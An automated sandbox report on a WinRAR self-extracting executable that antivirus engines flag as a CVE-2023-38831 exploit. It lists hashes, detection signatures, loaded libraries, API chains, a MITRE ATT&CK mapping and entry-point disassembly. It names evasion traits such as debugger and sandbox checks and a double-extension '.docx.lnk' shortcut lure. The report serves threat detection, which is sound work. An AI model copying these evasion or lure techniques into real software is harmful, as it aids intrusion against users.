
Windows Analysis Report
fcl52nBWuY.exe

Overview

General Information

Sample name: fcl52nBWuY.exe (renamed because original name is a hash value)
Original sample name: 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a.exe
Analysis ID: 1522691
MD5: f80c1317f5043d991a91e5fb6399e658
SHA1: b62f2cfb8d9856dd59416675bc5d0bfaa748a1be
SHA256: 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
Tags: exe, UAC-0099, user-JAMESWT_MHT

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
File is packed with WinRar
Found evasive API chain (date check)
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious LNK Double Extension File Created
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • fcl52nBWuY.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\fcl52nBWuY.exe" MD5: F80C1317F5043D991A91E5FB6399E658)
  • cleanup
No configs have been found
No yara matches
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems), frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\fcl52nBWuY.exe, ProcessId: 7652, TargetFilename: C:\Users\user\Desktop\???i????-623-6341-11.docx.lnk
No Suricata rule has matched


AV Detection

Source: fcl52nBWuY.exe | Avira: detected
Source: fcl52nBWuY.exe | ReversingLabs: Detection: 65%
Source: fcl52nBWuY.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: fcl52nBWuY.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: fcl52nBWuY.exe
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0004BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0004BA94
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005D410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0005D410
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0006C4F8 FindFirstFileExA, 0_2_0006C4F8
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005B080 SetWindowLongW,NtdllDefWindowProc_W, 0_2_0005B080
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00047AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00047AAF
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000492C6 0_2_000492C6
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00057DCC 0_2_00057DCC
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00055001 0_2_00055001
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00058243 0_2_00058243
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00055272 0_2_00055272
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00066298 0_2_00066298
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000502F7 0_2_000502F7
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000513F6 0_2_000513F6
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005741E 0_2_0005741E
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000664C7 0_2_000664C7
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000555A0 0_2_000555A0
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0006E5F0 0_2_0006E5F0
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000507A0 0_2_000507A0
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0004D833 0_2_0004D833
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005889F 0_2_0005889F
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0004395A 0_2_0004395A
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00044A8E 0_2_00044A8E
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0006EA9E 0_2_0006EA9E
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00072BA4 0_2_00072BA4
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0004FCCC 0_2_0004FCCC
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00042EB6 0_2_00042EB6
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: String function: 00060790 appears 31 times
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: String function: 0005FEEC appears 42 times
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: String function: 0005FFC0 appears 56 times
Source: fcl52nBWuY.exe, 00000000.00000003.1445859652.00000000032DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename D3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exe, 00000000.00000003.1444405246.00000000032DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename D3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exe, 00000000.00000003.1446310731.00000000032DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename D3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exe, 00000000.00000003.1445469986.00000000032DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename D3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exe, 00000000.00000002.1455282468.00000000032DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename D3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal56.winEXE@1/1@0/0
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00047727 GetLastError,FormatMessageW, 0_2_00047727
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005B0BE CLSIDFromString,CoCreateInstance, 0_2_0005B0BE
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005B6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_0005B6C2
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4905281
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Command line argument: sfxname 0_2_0005F04C
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Command line argument: sfxstime 0_2_0005F04C
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Command line argument: STARTDLG 0_2_0005F04C
Source: fcl52nBWuY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: fcl52nBWuY.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | File read: C:\Users\user\Desktop\fcl52nBWuY.exe
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: dataexchange.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: d3d11.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: dcomp.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: msiso.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: mshtml.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: srpapi.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: msimtf.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: d2d1.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: d3d10warp.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: dxcore.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: mlang.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: uiautomationcore.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: fcl52nBWuY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: fcl52nBWuY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: fcl52nBWuY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: fcl52nBWuY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: fcl52nBWuY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: fcl52nBWuY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: fcl52nBWuY.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: fcl52nBWuY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: fcl52nBWuY.exe
Source: fcl52nBWuY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: fcl52nBWuY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: fcl52nBWuY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: fcl52nBWuY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: fcl52nBWuY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4905281
Source: fcl52nBWuY.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000607E0 push ecx; ret 0_2_000607F3
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005FEEC push eax; ret 0_2_0005FF0A
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Memory allocated: 79A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Evasive API call chain: GetLocalTime,DecisionNodes graph_0-24132
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0004BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0004BA94
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005D410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0005D410
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0006C4F8 FindFirstFileExA, 0_2_0006C4F8
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005F81F VirtualQuery,GetSystemInfo, 0_2_0005F81F
Source: fcl52nBWuY.exe, 00000000.00000002.1455074358.0000000003271000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | API call chain: ExitProcess graph end node graph_0-24285
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000609FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_000609FA
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000691A0 mov eax, dword ptr fs:[00000030h] 0_2_000691A0
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0006D1E0 GetProcessHeap, 0_2_0006D1E0
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_000609FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_000609FA
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00060B8D SetUnhandledExceptionFilter, 0_2_00060B8D
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00060D7A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00060D7A
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00064FDF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00064FDF
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_00060816 cpuid 0_2_00060816
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0005C083
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0005F04C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0005F04C
Source: C:\Users\user\Desktop\fcl52nBWuY.exe | Code function: 0_2_0004C365 GetVersionExW, 0_2_0004C365
MITRE ATT&CK matrix (one line per tactic, cells in the report's row order; a number in front of a technique is the count shown in the report's matrix cell):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; 1 Native API; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 System Time Discovery; 21 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 File and Directory Discovery; 34 System Information Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label | Link
fcl52nBWuY.exe | 66% | ReversingLabs | Win32.Exploit.CVE-2023-38831 |
fcl52nBWuY.exe | 100% | Avira | EXP/LNK.Agent.jkrfv |
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522691
Start date and time: 2024-09-30 15:31:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fcl52nBWuY.exe (renamed because original name is a hash value)
Original Sample Name: 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a.exe
Detection: MAL
Classification: mal56.winEXE@1/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 118
  • Number of non-executed functions: 98
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: fcl52nBWuY.exe
No simulations
No context
Process: C:\Users\user\Desktop\fcl52nBWuY.exe
File Type: MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Wed Nov 8 04:43:43 2023, mtime=Wed Nov 8 04:43:43 2023, atime=Wed Nov 8 04:43:43 2023, length=0, window=hide
Category: dropped
Size (bytes): 20332
Entropy (8bit): 5.73833469346233
Encrypted: false
SSDEEP: 384:BeqmQq06/c/JNjKn3kHRi13pFLQpHTdUe2IJbv27RznfCLd:nmtNV3kHRi13r0hl2IJkRjSd
MD5: C52B08EA962C2B3CA0FF41FE1ED5DBB3
SHA1: 0B54EE5B102341E6D4C735382C052B6EB59C74DC
SHA-256: 762C7289FB016BBCF976BD104BD8DA72E17D6D81121A846CD40480DBDD876378
SHA-512: 33077CF194455557B200D94E75DFD9F1D6EC8078C88D63485D5BDAD6ED57AA61B174B7FB197722E1400C7845AAD6E2214E748566F52A531C0D0EC2B32E94D500
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.786957907165894
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: fcl52nBWuY.exe
File size: 339'886 bytes
MD5: f80c1317f5043d991a91e5fb6399e658
SHA1: b62f2cfb8d9856dd59416675bc5d0bfaa748a1be
SHA256: 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
SHA512: e43b555e36bd06d380656f5752229059de59c1e973832a7b533212f00bfc968edc8ae43fb3e407dd58d93ed80e7833185049d751a75aaa8382e4f91612d1fb0b
SSDEEP: 6144:ntH/xNLaAOvIBd7lAAxWS1elIoSN6WX+t45q0cp:ntH5NLaAdDhAAEIFcWX+t4oz
TLSH: 7774B0027AC585B2D57328331A359F20A67D7C301F758EDB9394695EDE321C09B32BA7
Icon Hash: 1515d4d4442f2d2d
Entrypoint: 0x420780
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x6474CCD4 [Mon May 29 16:03:32 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 0ae9e38912ff6bd742a1b9e5c003576a
Instruction
call 00007F332C6F10CBh
jmp 00007F332C6F0A7Dh
int3
int3
int3
int3
int3
int3
push 00423A80h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [004407A8h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F332C6E3911h
push 0043D14Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F332C6F3725h
int3
jmp 00007F332C6F55F8h
push ebp
mov ebp, esp
and dword ptr [00463D58h], 00000000h
sub esp, 24h
or dword ptr [004407A0h], 01h
push 0000000Ah
call dword ptr [004341C4h]
test eax, eax
je 00007F332C6F0DB2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
Programming Language:
  • [ C ] VS2008 SP1 build 30729
  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3e380 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e3b4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
